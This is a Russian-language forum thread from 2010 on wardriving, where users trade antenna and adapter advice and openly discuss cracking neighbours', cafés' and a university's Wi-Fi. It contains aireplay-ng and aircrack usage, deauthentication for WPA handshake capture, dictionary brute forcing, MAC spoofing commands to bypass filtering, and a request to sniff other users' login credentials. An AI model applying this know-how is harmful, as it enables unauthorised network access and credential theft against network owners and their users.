DAUN
03.09.2010, 16:49
здраствуйте,пользуюсь бт4
при попытке запустить aireplay-ng

aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h 00:11:22:33:44:55 -e WRLS wlan0
Получается следующее:

15:05:26 Sending Authentication Request (Open System)
15:05:26 Authentication successful
15:05:26 Sending Association Request
15:05:26 Got a deauthentication packet! (Waiting 3 seconds)

15:05:29 Sending Authentication Request (Open System)
15:05:29 Authentication successful
15:05:29 Sending Association Request
15:05:29 Got a deauthentication packet! (Waiting 5 seconds)

и т.д.

В чем проблема, кто может подсказать?

PRosTo_LEva
03.09.2010, 17:51
Антенна аналог антене Dlink http://dlink.ru/ru/products/2/388.html Сразу скажу показатели и характеристики скачут. разница в цене 120 - 150 баксов - естественно в пользу Длинка.
Собирают эти антенны на Украине по моему.. сильный разброс направленности луча, сильно подвержены коррозии.

ColdLikeIce
04.09.2010, 10:25
Нашел сеть с шифрованием wep, насобирал пакетов больше трехсот тысяч, запускаю aircrack, а он, после 10-15 минут неуспешной работы пишет "segmentation fault" и завершает работу.
И так на двух сетках подряд(((

Кто-нибудь сталкивался с таким? Раньше все работало гуд

xo6ot
07.09.2010, 01:00
Салют всем !

Кто нибудь смог настроить и пользует в бт ,
это чудовище Linksys WUSB54GC v3 (ID 1737:0077) черный корпус

tigros
07.09.2010, 21:39
всем привет.ваш вердикт плиз: http://cgi.ebay.es/ANTENNE-WIFI-LONGUE-PORTEE-OMNIDIRECTIONNELLE-22-dBi-/260645144183?cmd=ViewItem&pt=FR_GH_Informatique_Composants_Cartes_R%C3%A9seau&hash=item3cafa94677

altblitz
07.09.2010, 21:53
правильно оценить качество карты - можно лишь на Linux`е.

# iwconfig wlan0
wlan0 IEEE 802.11bg ESSID:"xxxxx"
Mode:Managed Frequency:2.xxxx GHz Access Point: 00:xx:xx:xx:xx:xx
Bit Rate=11 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=61/70 Signal level=-49 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

# ifconfig wlan0
wlan0 Link encap:Ethernet HWaddr 00:xx:xx:xx:xx:xx
inet addr:xxx.xxx.xxx.xxx Bcast:xxx.xxx.xxxx.xxx Mask:255.255.255.0
inet6 addr: xxxx:xxx:xxx:xxx:xxx/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8626 errors:0 dropped:0 overruns:0 frame:0
TX packets:6296 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4532645 (4.3 Mb) TX bytes:1517011 (1.4 Mb)

Link Quality - должно быть не менее 60.
и если брать на eBay - у продавца с репутацией не ниже 99.5 %

рекомендуются по опыту - ebay.be/de/nl/uk

tigros
07.09.2010, 22:51
спасибки, эт я знаю. а как узнать, работает она на 22 DBi ?

altblitz
08.09.2010, 05:20
вот это мне неизвестно, 22 DBi

самое простое и лучшее решение - узнать, какие Вай-Фай карты ставит провайдер в твоём городе.

rt8187/rtl8187 - годно и надёжно.
чип-сет используется провайдерами на Диком Западе, работает - как надо.

выпускается под разными наименованиями, как решат фабриканты ))

phy0: Selected rate control algorithm 'minstrel'
phy0: hwaddr 00:хх:хх:хх:хх:хх, RTL8187BvE V0 + rtl8225z2, rfkill mask 2
rtl8187: Customer ID is 0x00
Registered led device: rtl8187-phy0::radio
Registered led device: rtl8187-phy0::tx
Registered led device: rtl8187-phy0::rx
rtl8187: wireless switch is on
usbcore: registered new interface driver rtl8187

Kharek
09.09.2010, 01:41
Доброй ночи!
Есть такой вопрос: работает ли пакет AirCrack под Windows 7 Ultimate? У меня все время выдает ошибку
c:\aircrack\bin>airserv-ng -d "commview.dll|Debug"
Opening card commview.dll|Debug
F1
init_lib()
Adapter <commview.dll|Debug> not supported
airserv-ng: wi_open(): No error
Нетбук еееРС 1001Р, сетевой адаптер Atheros AR2427. CommView поставил нормально, установил пропатченные дрова, все работает, а в AirCrack вообще ничего не хочет запускаться.

Alromcheg
17.09.2010, 05:34
Ответьте плиз.
Ноут Asus K70A
Карточка Atheros AR9285
ОС Windows 7
Commview 6.3 (только там смог найти дрова под винду) - прога не взломана - кряка найти не смог - а оценочная версия я так понял не все собранные пакеты в отчет выводит? у меня за ночь она набрала всего 11000 IVs.
Пробовал снифать AiroWizard-ом - когда доходит дело до аутентификации - она не проходит и соответствено дальнейшие действия - типа инъекции, не получаются.
пробовал ставить на ночь - вообще какая то ерунда получается. AiroWizard тупо вышел из режима мониторинга - соответственно отрубив airodump и никакой dump файл не создал вообще. А затем вообще выдал ошибку типа "temp.dump используется другим процессом вырубите программу" :mad:

Как заставить эти проги нормально работать? мож у кого есть кряк под commview 6.3 - она то вроде нормально сннифает? или лучше все тки залезть в дебри линукса с BT4? там то мой atheros 9285 нормально работает?

HIMIKAT
17.09.2010, 09:11
Такой у меня вопрос будет. С вафлей раньше никогда не работал. Значит у меня от дома имеется кафэ в нем раздается интернет по Wi-Fi. От меня до кафэ примерно 200 метров, плюс между нами несколько домов 5-этажек. Так вот, какова дальность у вафли и смогу ли я подключится к этой точке, если брать в расчет, что на всем расстоянии в качестве препятствия будут еще дома. На какую вообще дальность бьет Wi-Fi, у всех ли устройств эта дальность одинакова, а так же обозначается она на коробке?

Kharek
17.09.2010, 11:07
Что касается моей проблемы - то она решилась запуском всех программ в режиме совместимости с ХР и еще от имени администратора.
Alromcheg, у меня тоже оценочная версия, но я смог насобирать достаточно пакетов, тут все зависит от того, есть ли трафик в сети, если его нет, то собирать там нечего. Походу оценочная версия собирает все пакеты, просто не отображает их через Лог Виевер.
HIMIKAT, на сколько мне известно, по стандарту вайфай работает на расстоянии не более чем 100 метров (это при условии прямой видимости, для нормальной работы вообще считается, что не более 30 метров. У самого была ситуация, когда расстояние до точки не более 100 м, но нету прямой видимости, точки видно не было. Увеличить дальность можно установкой направленной антены, но далеко не факт, что аж на такое расстояние будет работать. Где-то читал, что вайфай работал на расстоянии 400 метров, только там были ДВЕ антенны направленные друг на друга.
По ходу у всех устройств дальность примерно одинакова (вроде бы есть определенный уровень сигнала, который запрещается превышать), но слышал, что в серьезных точках есть настройка уровня сигнала, так что в этом кафе может быть даже и уровень еще ниже. На моем роутере и адаптере дальность вообще не была написана.
Есть вариант попробовать найти инет как раз в многоэтажных домах, недавно ездил в гости в другой город, так в спальном районе было полно точек доступа, из них много WEP, а его взломать не проблема )))

Alromcheg
17.09.2010, 11:28
ладна буду запасаться терпением - пусть коммвью потихому ковыряет - за неделю глядишь наберет пакетов сколько нужно :)
второй момент сделал через unebootin загрузочную флешку backtrack4. начало проходит нормально - после того как набираю startx черный экран и все. это система так долго грузится или что? просто я минут пять подождал - больше возможности на работе не было, картина все та же -"черный квадрат".

Kastor
17.09.2010, 15:45
А зачем вам CommView именно 6.3? Предыдущие версии тоже не плохо справляются с ловлей пакетов. Могу 6.0.5 выложить с таблеткой (хотя и в нете найти можно).

На счет кафе с WiFi и пятиэтажек. HIMIKAT, я так понял прямой видимости от твоего дома к кафе нет из-за пятиэтажек. Сомневааюсь, что сеть будет тебе доступна. Лучше действительно поискать сеть в соседних домах.

Alromcheg, на счет инжекта пакетов описано в этот статье
http://lex.gs/security/vzlom-wifi-setej-ili-vozdushnaya-trevoga.html
но тут под линуксом.
Я пробовал данный способ, но нагнетать трафик не получалось. Если у кого то получалась данная атака, расскажите пожалуйста как вы это сделали.

altblitz
18.09.2010, 15:15
страна того селлера - Испания, Франция, Италия - искать приключений с цыганами себе на мягкое место.
он сбыл с рук то гауно за 82 EURO + 20 EURO пересылка (свистни мне в пиписю, если дойдет :))

правильное теперь:
24 dBi Grid Dish Outdoor 2.4GHz Wireless Wi-Fi Antenna,
и это лучшее в мире - в классе ВайФай антенн.

http://images.marketplaceadvisor.channeladvisor.com/hi/73/72897/an24-ld11.jpg

селлер - 99,8% Positieve feedback. ОК.
EUR 30,62 (за 15 часов до окончания аукциона) + $ 85 USPS Express Mail Delivery.
цену за доставку можно сбить до $ 40-50, если выбрать не EXPRESS. ОК.
товар принимается обратно ? да. ОК.

а еще есть поиск на eBay по ключевым словам "wi-fi dBi".
выбор - за tigros ))

altblitz
18.09.2010, 15:48
вопросов, много их )
и самое интересное - работает ли кафе после 22:00 ?

/me, ни разу не задумываясь,
просто вставил USB-штуковину и набрал команду : `iwlist scan'
и все ВайФай акцес-пойнты на экране:
канал, способ шифрования, уровень сигнала.

HIMIKAT, Нургалиев тебе разрешил,
пробуй сам, у себя на месте ))

Alromcheg
20.09.2010, 09:58
commview нужен именно 6.3 потому что на более ранних версиях нет поддержки моей карты.
второй момент - скачал BackTrack4 с помощью unebootin смонтировал ее на флеху - но тут облом - отказывается работать на моем ноуте Asus K70A - пишу startx - выдает какую то ошибку и не загружается :(
и третий вопрос: aircrack выдал мне key found, однако стоит поставить галочку "выдавать результаты в виде символов (ну че то наподобие - чтобы сразу ключ расшифрованный шел) - он пишет что мол все плохо пакетов мало пробуйте скопить больше.
как можно ручками расшифровать этот несчастный код?
C5 : 12 : D3 : 0C : DB : FE : 13 : 77 : 6B : D5 : 02 : 79 : C2

BrainDeaD
20.09.2010, 11:03
этот код есть только в хексадецимальном виде. то есть эквивалента в ascii к нему нет.

на будущее тебе поможет конвертер http://www.dolcevie.com/js/converter.html

Alromcheg
20.09.2010, 13:22
тогда встречный вопрос - если эквивалента в ascii к нему нет, то получается что это неверный код? т.е. нужно собирать больше пакетов? а если он верный то куда его запихнуть?

Gusev
20.09.2010, 22:27
WiFi на каком расстоянии может максимум работать

zlo12
20.09.2010, 23:13
Вики говорит:

но у меня берёт метров на 15 дома максимум :(

Alromcheg
21.09.2010, 05:40
Опять вопрос - указываю я полученный Key Found в виндозовском (7ка бэзик) подключении к точке в виде 26 символов 16-ричного кода. Результата ноль. НЕ ПОДКЛЮЧАЕТСЯ. Индекс ключа - хз че это и какой указывать, пробовал все четыре по очереди - не помогает.
в принципе когда пытался провести fake authentification в Airo Wizard тоже она не проканывала - в чем проблема?
и если не будет коннектится к открытой точке доступа тогда что это вообще может быть?

altblitz
21.09.2010, 05:55
зависит от антенны.
1-2 километра - отнюдь не предел с 24 dBi антенной

45 EUR + пересылка.
(не спам, техническое инфо)

http://varia-store.com/images/ebay/WIFI-LINK/items/wifi-link_277155.jpg

altblitz
21.09.2010, 06:00
у /me - 500 m, прямой видимости, на USB штуковину - Lin/Win.

дело в том, что по соседству - клуб линуксоидов ))

BrainDeaD
22.09.2010, 01:54
туда же куда ты запихифаешь и обыкнофенный пароль

Alromcheg
22.09.2010, 05:45
почитал в нете инфу - по ходу получается что я ловлю слабый сигнал от АР (30-35%) а она меня не слышит совсем - раз на фейк аутентификацию ругается Waiting for beacon frame. No such BSID available.
выход только усб-плюха с подключаемой антеной?

trup_slona
24.09.2010, 09:01
какой usb wi-fi адаптер лучше всего купить? чтобы сигнал хорошо принимал, а то в бук встроенный чета слабовато держит

PvgValo
24.09.2010, 10:20
Причины слабого сигнала wi-fi: ковры, штукатурка, отражающие поверхности, бытовые утройства (микроволновка).
Прежде чем покупать юсб адаптер, убедись что в ноуте действительно проблемы, проверь на нескольких роутерах.

trup_slona
24.09.2010, 10:58
не думаю что проблемы в ноуте. Помех никаких нет, стол возле окна, со стороны которого идет сигнал, просто далеко источник находится, сигнал слабый поэтому. Вот надо что-то купить чтобы нормально все было

Alromcheg
27.09.2010, 10:07
еще такой момент - если aircrack написал Key Found - это 100% верный ключ? или может быть неверным?

4ikotillo
28.09.2010, 05:33
Точно верный, только вводите без двоеточий (:) :D

4ikotillo
28.09.2010, 05:38
при выборе важно 2 параметра, лично для меня 3.

1. Чипсет на котором построен адаптер. Всю информацию можно найти в интернете. Естественно он должен поддерживать работу с airodump-ng.

2. Мощность, желательно 1 Ватт.

3. Ну ИМХО, выход на внешнюю антенну.

4ikotillo
28.09.2010, 05:41
Можно за такие деньги взять все направленную, горизонтальной поляризации 21 dBi, будет брать на 1-2 км. Проверенно. Это как вариант. :D

Alromcheg
28.09.2010, 11:17
тогда какого, извиняюсь за выражение фига, если это ключ верный меня не пускает?

Alromcheg
28.09.2010, 13:06
вообще какая то сетка странная ловится - что aircrack что commview ее распознают как просто Home Network. а винда ее распознает сначала Home Network, потом Home Network 2, потом Home Network 2 3, сейчас вообще Home Network 2 3 4, и что то мне подсказывает что это не предел. пакеты от нее еле-еле летят и законектится к ней у меня не получается.

Alromcheg
29.09.2010, 13:45
ну вот пожалуйста - сетка стала Home Network 2 3 4 5

max90
02.10.2010, 13:57
Привет всем! вопрос такой
Как пользоваться Wifi в Макдональдсе? нужен ли какой нибудь пароль? и в каких макдаках есть wifi?

maximka77
04.10.2010, 16:28
Во все маках есть wi fi,найди точку доступа и подключись там пароля вообще нет.

max1256
07.10.2010, 13:50
есть сеть открытая как узнать диапазон ип в этой сети...(ось backtrack 4). СПасибо.

4ikotillo
10.10.2010, 04:44
Сканируй эфир программой kismet. Это самый простой способ, а так запусти любой снифер - weirshark, ettercap.

Ну или просто подключись к сети, wicd сам тебе покажет диапазон ip адресов =) Сеть то открытая =)

dupD0M
11.10.2010, 14:20
Подскажите "радио-интернет"считается безпроводным интернетом или сетевым?и относится ли он как wi-fi ?

LorDXEO
12.10.2010, 09:37
Вопрос насчет 1w адаптера:

А реально ли что после н-го време росвязьнадзор прийдет?
просто почитал что у нас в России разрешение в 100 мВт только. Или это для точек доступа, а в режиме клиента не попалят?)

Заранее спасибо!

теща
13.10.2010, 04:31
в роутерах G 1-2 не сьемны
в роутерах N 1-2-3 сьемные антены , аеще така как на даный момент ето мощный роутер щитаеться на нем обизательно писать будет N большая буква ))

теща
13.10.2010, 04:33
кто куд придет ? кому ты нужен ?*))))
читай статейки по wifi , я вот думаю на 4w взят ток падла стоит он 170 баксов

maxad
19.10.2010, 22:51
Ребята подскажите как в bt4 примонтировать жеский диск или хотяб флешку?
чтоб их увидеть. или раскажите как увидеть?
зарание спасибо.

теща
19.10.2010, 22:59
написано не в етой теме

када тыкаеш флешку она определяеться ,

заходиш в меню как в винде пуск ищеш sistem menu вкладка медиа там твои диски

maxad
19.10.2010, 23:46
странно. когда поставил флешку тогда только все диски показал.

paas
20.10.2010, 20:14
Срочно!!! Нужно поснифать пакетики под винду. Airodump и CommView не работают из-за драйвера(Realtek 8187) сам адаптер GSKY gs27. Под образами не могу работать из-за слабой машины и немного корявах рук (удалось только подобрать только WEP, и то отфильтровали меня по маку (сцуки)). Другую точку "ломал" часов 15, результат 0. Вот скрин образа которым "ломал" http://www.photoshare.ru/photo6231934.html

Kverter
23.10.2010, 03:34
Ребята нужна помощь))))вобщем такая трабла(
имеится ось ВТ4 r1 и чип Atheros AR9285
есть ключь от сети с wep шифрование но wicd не конектится к ней тупит на проверке ключа .....
пробывал на открытой точке результат такой : приконектилась но пакеты не идут
вобщем такая трабла((((

alphacool
24.10.2010, 14:31
здаров всем)есть вопрос возможен ли вардрайвинг с DWL-122 ? :confused:

Keltos
24.10.2010, 15:26
поставь backtrack на флешку и затести
лучше R1

теща
24.10.2010, 15:28
а конкретно если знать хочеш зайди в отдел с списаками и зыркни есть она там или нет

Kverter
24.10.2010, 21:28
так кто нить сталкивался с таким?

теща
24.10.2010, 21:34
wicd ??????

роутер глючит , или ты его настроил плохо . если он твой если не твой то фильтра включены.................. хз

Kverter
24.10.2010, 21:36
фильтра не стоят,роутер мой настроен правельно....вобще ни ко дной точки конекта нет((((из под винды все ок....

теща
24.10.2010, 21:46
чет я не понял какие подключения ни к одной точке ???? что ты имееш ввиду ???????
понятней сформулируй

Kverter
24.10.2010, 21:50
имеется пароль от точки.....я в линухе пытаюсь к ней приконектится через wicd....но не удачно даже к открытым как то странно пишет конект есть пакеты не идут(((

теща
24.10.2010, 21:53
гы дружыще тебе в линукс отделлл , там ребята помогут ...
а я бошку ломаю что за прикол а тут ваще другая ось

Kverter
24.10.2010, 21:54
ось то BT 4

Kverter
24.10.2010, 22:27
посмотри как эта тема называеьтся)))

mazaxaka
25.10.2010, 14:46
у меня 7-ка и линук минт
обе видят 2 сетки. но в линуксе к обоим без проблем подключаюсь. а в 7-ке подключает а потмо обрывает и пишет невозможно подключится

YUFICK
25.10.2010, 17:58
всем привет, хочу себе приобрести данный адаптер TP-Link TL-WN7200ND
chipset Ralink

для вардрайвинга сойдет?

Erho_Sen
26.10.2010, 23:58
что-то тут было написано, не относящееся к вай-фаям и тд.

Прости тов-щи, не вту тему написал)

Peret
27.10.2010, 23:19
Возник такой вопрос. есть сеть с WPA2 и уже подобранным паролем, но выход в инет только через trafic incpector. где у каждого пользователя свой логин с паролем... можно как-то заполучить этот логин пароль?если да, то с помощью каких программ?

4ikotillo
28.10.2010, 08:14
Посмотри это, сам не проверял https://forum.antichat.ru/showthread.php?p=922280

Peret
28.10.2010, 15:42
к сожалению там ссылка не рабочая, да плюс к тому же еще и сеть с универа, а если точнее кафедры IT, так что качать что-то непонятное они не станут... тут пароль перехватывать придется.... вот только как?и чем?

4ikotillo
28.10.2010, 18:32
Там авторизация идет через web интерфейс в браузере?

Stopko_0
28.10.2010, 19:06
у тебя, скорее всего, статический айпишник одной подсети прописан через wicd, а в этой сети используется другая подсеть, например. из-зв такого пакеты могут не идти, потому что дропаются на точке доступа, т.к. адрес отправителя не совпадает с подсетью точки доступа

попробуй в винде подключиться через утилиту, идущую в комплекте с драйвером адаптера,это точно должно помочь

дело не в операционной системе, а в настройках адаптера, конкретно - в айпишнике.

тем же, чем ловил пакеты, когда ломал впа2. aircrack, kismet,tcpdump - на выбор.

Peret
28.10.2010, 20:05
Я никогда не видел сам момент входа.но думаю, скорее всего, нет.
Еще такой вопрос, допустим, наснифил я сap файлик и знаю пароль к сети, как с этого файлика достать нужный логин и пароль? точнее чем? если не трудно, то киньте ссылки на описание сего процесса

jek79
29.10.2010, 21:15
помогите пжалуста словарик испанский сделайте кто нить большой-хороший-надёжный )) оч надо для WPA или подскажите как сделать или кто может ?

j-prof
04.11.2010, 13:11
сам не подключился снифю пакеты на mon0
снифится почемуто ток какойто протокол ieee
как снифить хттп и т.д. :D :confused:

j-prof
04.11.2010, 17:20
и киньте видос или статью по взлому вай фая :confused:

j-prof
04.11.2010, 17:21
и исчо когда снифаю точку айродампом и при этом отключаю юзеров айрплэем почемуто нет хэндснэйков

теща
06.11.2010, 13:58
1. клиенты должны висеть на точке :-)
хотяб 1 клиент ддолжен был быть подключен
2. ты када атаку делаеш смори отключаються клиент(ы) или нет.
3. может стоять защита на роутере антидос...

пс. скорей всего на точке небыло клиентов

Сообщение от j-prof и киньте видос или статью по взлому вай фая

может за тебя взломать и подключить и использовать интернет ?
предоставленная информацыя на форуме изложена по шагам и с сылками на видео

j-prof
06.11.2010, 14:30
я догадываюсь что так потомучто сигнал -90 - -80.

ну с тем как ломать разобрался.

исчо вопрос а можно взломать впа впа2 без хэнд ?снэйков прост если дата насобирать :confused:

ЗЫ а что делать если макченджем не меняется
мак пишет что-то про преммисионс и т.д.(а сижу из под рута)
но в какойто гуи утилите по взлому там жму кнопку рандом мак и он меняется
и естьли аналог айрмона под винду
и как всётаки отснифать пассы не подключаясь к седке :confused:

теща
06.11.2010, 15:16
возможно , хотя б 70-60
нет
ищи другой метод , пока у нас нету .

iv.
06.11.2010, 15:18
Нет.

ifconfig <интерфейс> hw ether <мак_адрес>
предварительно нужно отключить интерфейс
ifconfig <интерфейс> down - для проводного
iwconfig <интерфейс> down - для беспроводного

С помощью airodump-ng
Если открытая сеть, то ничего не надо знать. Если WEP шифрование - нужно знать ключ. Если WPA/WPA2 - то никак вроде (хотя были какие-то наработки, не слежу уж за этим =\).

zirex
08.11.2010, 16:36
добрый день
вопрос таковой - если клиента почти невозможно засечь в сети, но стоит фильтрация мак-адресов, как тут быть?

j-prof
09.11.2010, 22:47
засечь его или брутить мак :D

j-prof
09.11.2010, 22:48
вобщем вопрос такой прикупил на днях роутер можноли его использовать в качестве антенны для ноута?

Kastor
10.11.2010, 01:12
Интересный вопрос.
Можно снять с него антенку и прикрутить к обычному USB-шному модему, если ты про это. Хотя я сомневаюсь.
Еще, если твоя АР поддерживает работу в режиме клиента, то можно ее использовать вместо адаптера.
Все, мои способности телепатии иссякли. Объястни, что ты имел ввиду =)

zirex
10.11.2010, 09:07
как мак брутить?

j-prof
10.11.2010, 09:24
либо вручную меняя
либо написать скрипт.

на счот роутера ну наверн в режиме клиента какнить заставить роутер dlink dir-300

PvgValo
10.11.2010, 09:36
А что ты конкретно имеешь ввиду? Антенну для приема другого беспроводного соединения?

j-prof
10.11.2010, 09:42
да точно

vajder
10.11.2010, 10:23
где взять хороший словник для wpa , подскажите пожалуйста

Stopko_0
13.11.2010, 07:15
можно. для этого надо его настроить в режим беспроводного клиента, если он этот режим поддерживает

Eduardf2000
17.11.2010, 09:02
Здравствуйте, всем!!!
Долго и с интересом читал форум... узнал много нового...
Сам я "рыбак", спутниковой рыбалкой пользовался лет пять...
Очень заинтересовал вардрайвинг.
Но для меня это совершенно ново, поэтому подскажите, пожалуйста.

Живу в спальном районе "утыканном" 9-ти этажками.
Со смартфоном прошёлся близ прилегающих домов
и увидел на своем экранчике много точек доступа,
в том числе и совершенно открытых (со смартфона вышел в инет через wi-fi!)
Правда уровень сигнала на смартфоне при этом еле-еле вытягивает

Сам живу на 9 этаже. Думаю остаться на операционке Винде XP или 7-ке.

После длительного чтения склоняюсь к покупке ALFA AWUS036H 1000mw (usb).
(хотя жаба отдать 2 тыщи за неё и душит :-)

А вот сканировать видимо буду из своего окна дома напротив.
Домов десятки, до них от 50 метров до 1 километра и больше.

Вопрос: хватит ли мне штатной антены (она как я понял круговая ???)
Или нужно брать направленную ??? или более мощную круговую ???

Раздел "Сделай сам" по изготовлению антенн своими руками читал,
но вряд ли справлюсь (к тому же пугает предостережение, что можно
"спалить" карту если антенна будет с "неправильным" сопротивлением).

Посоветуйте, пожалуйста, какую антену купить направленную или круговую ???
Чтобы из окна дома напротив стали "доступны". Марку, если не трудно, подскажите...

И прав ли я в выборе карты (ALFA) ???
Чипсет у неё "правильный" ???
Спасибо за советы.

j-prof
17.11.2010, 10:38
для ахероса исчо подскажите на ноут ток недорого

-Straniks-
17.11.2010, 21:06
Ловит wi-fi, как написать хозяину? есть ли софт? Можно ли по сигналу найти его ?

Eduardf2000
18.11.2010, 10:39
Извеняюсь, но уже обращался 2 постами выше...
Помогите с вопросами...
Можете посказать ???
Хотелось бы "правильное" оборудование взять !!!

slivon5
19.11.2010, 14:21
Извеняюсь, но уже обращался 2 постами выше...
Помогите с вопросами...
Можете посказать ???
Хотелось бы "правильное" оборудование взять !!!
посты выше не читал, скажу от себя... для начала, самое главное в вардрайвинге, чтобы была пригодная вай-файка :) здесь список пригодностей :)
https://forum.antichat.ru/thread57249.html
скажу со своего опыта, лучше иметь внешнюю вай-файку, так как есть возможность подкл. внешние антены, кот. дадут лучшый сигнал..

slivon5
19.11.2010, 14:24
а вот для совсем любопытных - набор вардрайвера :)
https://forum.antichat.ru/thread234068.html
ищите и найдете...

bombapiter
21.11.2010, 14:40
Какую антенну направленную посоветуете к этому девайсу AWUS036H?

Я бы взял эту APA-M05 , но не могу найти где купить.

4ikotillo
21.11.2010, 14:53
ebay.com тебе в помощь, не поленись закажи оттуда, там их превеликий выбор.

4ikotillo
21.11.2010, 14:55
В принципе можно, если у тебя есть направленная антенна. А так пользуйся inSSIDer, она есть в теме софта, по уровню сигнала поймешь где точка находится.

4ikotillo
21.11.2010, 15:07
Чипсет у Альфы "правильный". Не устаю повторять за всем оборудованием идем дружно на ebay.com, и за альфой в том числе, пускай ждать доставки около месяца, но зато выбор большой и цены очень аппетитные. А если не придет вовремя всегда можно деньги вернуть. Но это я в оффтоп пошел.
Для вашего случая лучше брать направленную антенну(меч окщения соседей) в районе 14-17 dBi, если вы будете из дома с 9-ого этажа сидеть. А "круговая", она же всенаправленная, она же палка наказания, будет в комплекте с альфой и не сможет полностью удовлетворить ваши запросы.

На ebay.com можно прям запросить "wardriving" и выйдет много вкусного, а в описании ко многим адаптерам прямо написано support in BackTrack(значит работать будет).

altblitz
21.11.2010, 15:36
4ikotillo, классный пост !
одно лишь но - доставка по Европе, обойдётся дороже самой карты. про US - и слов нет.

и кстати да, брать и выбирать карту с "круговой" антенной.
почему ? потому что, можно комп поставить у окна - дальнобойность повышается,
можно погуглить, и найти - "как повысить качество приёма антенны Вай-Фай"

Semby68
21.11.2010, 18:43
ДА ПО ЛЮБОМУ БРАТЬ АНТЕННУ ПАНЕЛЬ, НАПРАВЛЕННУЮ И ЧЕМ БОЛЬШЕ БИТ ТЕМ КРУЧЕ.
У МЕНЯ ВООБЩЕ Параболическая антенна.ДА И ПАНЕЛЬ ТОЖЕ КУПИЛ. НЕ ЖАЛУЮСЬ.

dupD0M
23.11.2010, 15:37
подскажите на линукс сканер сети как нить на подобии commview for wifi?

4ikotillo
24.11.2010, 19:48
Какие потребности и задачи?

Eduardf2000
25.11.2010, 11:01
Уже месяц страдаю, читаю инет, форумы, статьи...
Хочу желязяку для вардрайвинга "правильную" купить.

Мне такую советуют:
EDIMAX EW-7318USG Ralink RT2571W chipset.

Подскажите, пожалуйста, это правильное решение ???
И чипсет в ней Prism или нет...
Смогу я на ней под Виндой ХР "вардрайвить" ??? :-)

У меня тарелка спутниковая без деля валяется.
Если я вместо конвертора поставлю штырь, который стандартно с картами wi-fi идёт и кабелем соеденю будет работать ???

И здорово ли это прибавит дальность приёма сигнала ???

bombapiter
25.11.2010, 12:57
А это нормально что запуске airodump-ng wlan1 поле DATA всегда равно 0 ?

При старте airodump-ng PWR у всех с минусовым значением, примерно -60
это нормально?

адаптер awus036h backtrack 4

dupD0M
25.11.2010, 19:04
ну те которые есть в CommView for WiFi!!
1. помогите поменять айпи на роутере d-link DIR-300 потому что он не дает мне настроить инет?(имеется ввиду айпи для входа в веб настройки роутера)

Keltos
26.11.2010, 20:54
Китай.
Выбирайте: http://www.dealextreme.com/products.dx/category.314~page.1~pagesize.52~pagesort.relevence

// там и альфы есть

php_master
28.11.2010, 00:11
ребят, у меня есть Направленная wifi-антенна. Хочу перехватить WPA хэш одной точки, подскажите куда будет целесообразнее направлять: чтобы был лучше сигнал WIFI точки (Access Point) или клиента, подключенного к Этой точке ?

И еще, какой минимальный должен быть сигнал от точки или клиента чтобы был шанс на перехват WPA хэша ???

Kastor
28.11.2010, 05:32
По моему пофиг куда направлять. Пакет, что рядом с точкой пролетит, что рядом с клиентом. Но я бы выбрал АР, так как она никуда не денется, а клиент может с ноутом и в парашу зайти или еще куда деться.

А на счет второго вопроса не знаю. Но мне кажется, что еслы ты с направленной антенной видишь нормально сеть, то с перехватом проблем быть не должно.

bombapiter
28.11.2010, 18:44
Народ, а как вы вообще взламываете WPA/WPA2 ?

Методом перебора паролей? Это же жесть ещё та! :)

Попробовал подобрать пароль... запустил cowpatty, словарь примерно 700Мб... Комп работал часов 12.... и ни фига.

Может есть другие пути решения этой задачи?

Спрашиваю чисто из интереса, так как на каждом углу кричат - сломаю wi-fi ! Реши проверить.

4ikotillo
29.11.2010, 05:42
Вообще то да, в общей части все перебором все зависит от мощности видеокарты и словаря. Хотя я выкладывал еще один способ, но он никому не пригодился.

Rastamanka
01.12.2010, 23:31
Кто подскажет есть ли способ взломать точку WPA2 с условием что к ней не подключен ни один клиент?
Просто в течении трех дней за ней наблюдаю и не одно устройство так к ней и не подключилось. А сигнал у этой точки самый наилучший.

Keltos
02.12.2010, 05:58
Вроде можно, кто то писал об этом в теме.
Но надо около 100к пакетов :o

tty0
02.12.2010, 06:12
без возможности получить хэндшейк остаётся только брутить сам пасс по ви-фи.

j-prof
02.12.2010, 08:26
подскажи ка брут для этого

altblitz
02.12.2010, 08:39
Извините, что отвлекаю Вас, подскажите, пожалуйста ..

если вежливо спросишь, Keltos может помочь. он знает.

вопрос с репутацией j-prof, /me отгоняет таких школьнегов как назойливых мух, и прав же в 99% случаев ))

altblitz
02.12.2010, 08:51
неразумно.

hand-shake - там и валяется пасс, или можно сымпровизировать сценарий подключения под этими данными.

Kastor
02.12.2010, 12:44
Интересно. Хотелось бы почитать об этом.
Просто, как я знаю WPA только брутом хэндшейка ломается. А пакеты нужно собирать только в WEP сетях.

kyzmi4
03.12.2010, 10:43
Подскажите пожалуйста, есть точка доступа с шифрованием WEP, к точке не подключен ни один клиент. За сутки поймал 50 тысяч IV airdumpom, но aircrack-ng не находит пароля. Пробывал и 64 бита и 128 бита. В чем моя ошибка? Точка очень нужна ибо на работе инет отрубили.

Использую: BackTrack 4 RC2, карта Intel Wi-Fi 5150 дрова iwlagn.

ЗЫ: Чтобы Wiresharkom пакеты TCP ловились, нужно ли подключится к точке доступа или это зависит от приема сигнала клиента Wi-Fi?

zserega
03.12.2010, 18:30
ALFA Network AWUS036NH 2000mW Chipset RT3070 поддерживает инжекцию или нет? не получается взлом WEP "without client"

zevs92
03.12.2010, 18:44
